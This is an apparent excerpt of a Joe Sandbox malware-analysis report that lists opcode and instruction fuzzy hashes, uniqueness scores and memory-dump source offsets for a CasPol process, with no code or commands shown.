                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd3cce22fa9d57e3a849608a6dc883d17c84a74181846698c716a13d6ee8f8be
                                                  • Instruction ID: 870f451122958244bef1f9f198a7ef9ab8047574e1d3c89d0a612a2a0a9d537e
                                                  • Opcode Fuzzy Hash: dd3cce22fa9d57e3a849608a6dc883d17c84a74181846698c716a13d6ee8f8be
                                                  • Instruction Fuzzy Hash: DF11F835A45328CFCB61EF20D88868AB7B5FF4A315F1041E9D44AA3344DB315E91CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 121869b779327c9df18337a3d005fbbf391e2bd69098cd55947fb668d662df47
                                                  • Instruction ID: 9ae70e0befd60199a0ea91cef9a0625e52d0ef94d321153704089a50bf7e26a0
                                                  • Opcode Fuzzy Hash: 121869b779327c9df18337a3d005fbbf391e2bd69098cd55947fb668d662df47
                                                  • Instruction Fuzzy Hash: B3010534A41328CFCB65DF20E888689B775BF46315F1081E9D50AA3344CB315E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 788f65f7d0fe1ec5d01bb271a4b88392a2a2800b19d4b8efb80bf171058fd875
                                                  • Instruction ID: bf239cd09e852572e3feda882e911fa450f50f46f72ae296f889949e9e0543ba
                                                  • Opcode Fuzzy Hash: 788f65f7d0fe1ec5d01bb271a4b88392a2a2800b19d4b8efb80bf171058fd875
                                                  • Instruction Fuzzy Hash: CCF0EF35A412288FCBA49F60E8886C9B775BF46315F2081E9D50AA3200DB325E81CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d26c07f5521801f16a8671e7c50d8b682f29709784767f059ccff0d30bf64599
                                                  • Instruction ID: d5ddd644fa2aceb4657cb2601ad968f6c55bbf7db77294049fe7bfe0e9174c35
                                                  • Opcode Fuzzy Hash: d26c07f5521801f16a8671e7c50d8b682f29709784767f059ccff0d30bf64599
                                                  • Instruction Fuzzy Hash: F0E092741483429BCB02DB74D455049BFB1BF432143698CAAC4558F253DB72E81787A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a16e7c628d8c0d3a839b36c50da17317f5dfafa9d68ac7b1d5523b1b56b4e6a9
                                                  • Instruction ID: c1bcf5d79377ad9405e2bf3da42543f468586dae8c308f129f844b0699f58e3a
                                                  • Opcode Fuzzy Hash: a16e7c628d8c0d3a839b36c50da17317f5dfafa9d68ac7b1d5523b1b56b4e6a9
                                                  • Instruction Fuzzy Hash: 2EE0123091421BEBCB09EFA4D8AA0ECBF38FB10311F50016ED91A53192EB310626CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 95eb920340d4c204bc70dbd2b6e129857b3c393873a9cdfbefdf545054f1d625
                                                  • Instruction ID: a153bd28e9e41bd5a4cdd38fec22d6b824b2bbdd44d9430689e47debc460b682
                                                  • Opcode Fuzzy Hash: 95eb920340d4c204bc70dbd2b6e129857b3c393873a9cdfbefdf545054f1d625
                                                  • Instruction Fuzzy Hash: 53E0C23AE04218DBCB10DF80E4886DCBBB5FB88326F10806AD92663251C7722D12CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 872a69616c13e98bf02e5da4f2bcb83466815d0bef8960372aaa277d8af8c22e
                                                  • Instruction ID: 10af5aa55e6aeb41030251239d453ab7123767968e978c7333e00d6ad9d897ef
                                                  • Opcode Fuzzy Hash: 872a69616c13e98bf02e5da4f2bcb83466815d0bef8960372aaa277d8af8c22e
                                                  • Instruction Fuzzy Hash: 41D02B7014430487CB00EF60D40504D77A5AF811143658D7CC0198F201DF73F8034BC6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed079510754423ce35fb8d65d6ed7540cdc6f5781006ef9d3f335d4a2df76934
                                                  • Instruction ID: 6d7c6bcaba0204fc75e9a06df69d7187af5e36f202433e5952527c929ab6323b
                                                  • Opcode Fuzzy Hash: ed079510754423ce35fb8d65d6ed7540cdc6f5781006ef9d3f335d4a2df76934
                                                  • Instruction Fuzzy Hash: 06D01230D14119EBCB08AB94D86A4BDBB38EB10211F4041ADD90A531929A31195ACAC1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7f47327baf47d6159863728024bb5402094c0afa1ebd4f8f466e2e076226e3e
                                                  • Instruction ID: c22e499b76faf5c3a024f439feec78298b5f566e8167737cb7952e4c16ea7617
                                                  • Opcode Fuzzy Hash: e7f47327baf47d6159863728024bb5402094c0afa1ebd4f8f466e2e076226e3e
                                                  • Instruction Fuzzy Hash: A4C04CB11511299BD3143BB8D98D5683BACFF44726B300679E10781591CF6B1C709A66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fccc74fb53df06701a77f750ec069bc14f18d81e496e208507cf501dca805ad1
                                                  • Instruction ID: 9e2659334e5a739adfee6685586c966f10a423cbc216369463509c131d33ad40
                                                  • Opcode Fuzzy Hash: fccc74fb53df06701a77f750ec069bc14f18d81e496e208507cf501dca805ad1
                                                  • Instruction Fuzzy Hash: 15B0123065800DC7C7088AC0D44903C7734E782211B0002D8E80912440CA221C608781
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%